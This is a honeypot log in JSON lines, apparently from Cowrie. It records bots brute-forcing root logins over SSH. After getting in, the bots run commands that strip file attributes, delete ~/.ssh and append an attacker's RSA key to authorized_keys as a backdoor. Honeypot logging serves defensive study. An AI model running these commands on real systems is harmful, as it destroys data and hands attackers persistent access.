{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:10:52.252144Z","src_ip":"212.227.235.229","session":"d9e6c1f453c3"}
{"eventid":"cowrie.login.success","username":"root","password":"0123","message":"login attempt [root/0123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:10:53.253849Z","src_ip":"212.227.235.229","session":"d9e6c1f453c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:10:53.818287Z","src_ip":"212.227.235.229","session":"d9e6c1f453c3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T16:10:53.819138Z","src_ip":"212.227.235.229","session":"d9e6c1f453c3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T16:10:53.820510Z","src_ip":"212.227.235.229","session":"d9e6c1f453c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:10:54.017608Z","src_ip":"212.227.235.229","session":"d9e6c1f453c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:10:54.523894Z","src_ip":"212.227.235.229","session":"d9e6c1f453c3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T16:10:54.524896Z","src_ip":"212.227.235.229","session":"d9e6c1f453c3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T16:10:54.757259Z","src_ip":"212.227.235.229","session":"d9e6c1f453c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:10:54.758327Z","src_ip":"212.227.235.229","session":"d9e6c1f453c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36414,"dst_ip":"1.2.3.4","dst_port":22,"session":"31e8c5dd4406","protocol":"ssh","message":"New connection: 212.227.235.229:36414 (1.2.3.4:22) [session: 31e8c5dd4406]","sensor":"my-vps","timestamp":"2025-08-26T16:10:54.995237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:10:54.999126Z","src_ip":"212.227.235.229","session":"31e8c5dd4406"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:10:55.246440Z","src_ip":"212.227.235.229","session":"31e8c5dd4406"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T16:10:56.247354Z","src_ip":"212.227.235.229","session":"31e8c5dd4406"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:10:57.500551Z","src_ip":"212.227.235.229","session":"31e8c5dd4406"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46674,"dst_ip":"1.2.3.4","dst_port":22,"session":"3537714c5898","protocol":"ssh","message":"New connection: 212.227.235.229:46674 (1.2.3.4:22) [session: 3537714c5898]","sensor":"my-vps","timestamp":"2025-08-26T16:10:57.744918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:10:57.752466Z","src_ip":"212.227.235.229","session":"3537714c5898"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:10:57.997596Z","src_ip":"212.227.235.229","session":"3537714c5898"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:10:59.010229Z","src_ip":"212.227.235.229","session":"3537714c5898"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:10:59.265144Z","src_ip":"212.227.235.229","session":"3537714c5898"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:10:59.266276Z","src_ip":"212.227.235.229","session":"d9e6c1f453c3"}
{"eventid":"cowrie.session.connect","src_ip":"46.35.164.127","src_port":47517,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca53fc5fc796","protocol":"telnet","message":"New connection: 46.35.164.127:47517 (1.2.3.4:23) [session: ca53fc5fc796]","sensor":"my-vps","timestamp":"2025-08-26T16:11:46.105610Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34428,"dst_ip":"1.2.3.4","dst_port":22,"session":"806cbea5cb60","protocol":"ssh","message":"New connection: 212.227.235.229:34428 (1.2.3.4:22) [session: 806cbea5cb60]","sensor":"my-vps","timestamp":"2025-08-26T16:11:49.990892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:11:49.991793Z","src_ip":"212.227.235.229","session":"806cbea5cb60"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:11:50.225679Z","src_ip":"212.227.235.229","session":"806cbea5cb60"}
{"eventid":"cowrie.login.success","username":"root","password":"123459","message":"login attempt [root/123459] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:11:51.202299Z","src_ip":"212.227.235.229","session":"806cbea5cb60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:11:51.731992Z","src_ip":"212.227.235.229","session":"806cbea5cb60"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T16:11:51.732898Z","src_ip":"212.227.235.229","session":"806cbea5cb60"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T16:11:51.733884Z","src_ip":"212.227.235.229","session":"806cbea5cb60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:11:51.969271Z","src_ip":"212.227.235.229","session":"806cbea5cb60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:11:52.458205Z","src_ip":"212.227.235.229","session":"806cbea5cb60"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T16:11:52.458953Z","src_ip":"212.227.235.229","session":"806cbea5cb60"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T16:11:52.694382Z","src_ip":"212.227.235.229","session":"806cbea5cb60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:11:52.695315Z","src_ip":"212.227.235.229","session":"806cbea5cb60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35164,"dst_ip":"1.2.3.4","dst_port":22,"session":"4024b3e0f710","protocol":"ssh","message":"New connection: 212.227.235.229:35164 (1.2.3.4:22) [session: 4024b3e0f710]","sensor":"my-vps","timestamp":"2025-08-26T16:11:52.899579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:11:52.900671Z","src_ip":"212.227.235.229","session":"4024b3e0f710"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:11:53.114786Z","src_ip":"212.227.235.229","session":"4024b3e0f710"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T16:11:54.009790Z","src_ip":"212.227.235.229","session":"4024b3e0f710"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:11:55.226167Z","src_ip":"212.227.235.229","session":"4024b3e0f710"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35730,"dst_ip":"1.2.3.4","dst_port":22,"session":"c85d8d21aca7","protocol":"ssh","message":"New connection: 212.227.235.229:35730 (1.2.3.4:22) [session: c85d8d21aca7]","sensor":"my-vps","timestamp":"2025-08-26T16:11:55.468950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:11:55.469860Z","src_ip":"212.227.235.229","session":"c85d8d21aca7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:11:55.704526Z","src_ip":"212.227.235.229","session":"c85d8d21aca7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:11:56.684331Z","src_ip":"212.227.235.229","session":"c85d8d21aca7"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:11:56.919802Z","src_ip":"212.227.235.229","session":"806cbea5cb60"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:11:56.921050Z","src_ip":"212.227.235.229","session":"c85d8d21aca7"}
{"eventid":"cowrie.session.closed","duration":33.872904777526855,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:12:19.978445Z","src_ip":"46.35.164.127","session":"ca53fc5fc796"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":55844,"dst_ip":"1.2.3.4","dst_port":22,"session":"51c0488066d0","protocol":"ssh","message":"New connection: 139.19.117.131:55844 (1.2.3.4:22) [session: 51c0488066d0]","sensor":"my-vps","timestamp":"2025-08-26T16:12:20.049845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:12:20.050772Z","src_ip":"139.19.117.131","session":"51c0488066d0"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T16:12:20.067102Z","src_ip":"139.19.117.131","session":"51c0488066d0"}
